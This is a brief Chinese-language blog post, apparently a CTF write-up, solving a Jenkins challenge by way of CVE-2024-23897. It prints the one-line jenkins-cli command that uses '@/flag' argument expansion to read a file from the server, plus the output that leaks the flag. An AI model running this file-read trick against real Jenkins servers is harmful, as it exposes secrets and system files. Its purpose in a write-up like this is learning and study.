RW-be

发表于 2024-02-05 分类于 challenge 阅读次数：

Be-a-Security-Researcher

开局login

弱密码，sql，ssti，xss—-no！

看大佬漏洞复现：https://www.leavesongs.com/PENETRATION/jenkins-cve-2024-23897.html


C:\Users\18774\Desktop>java -jar jenkins-cli.jar -s http://47.96.171.129:8080 who-am-i "@/flag"

ERROR: No argument is allowed: **rwctf{jenkins_no_vulner!!}**

java -jar jenkins-cli.jar who-am-i

Reports your credential and permissions.

ok！

本文作者： chleynx
本文链接： https://chensonghi.github.io./2024/02/05/RW-be/
版权声明： 本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！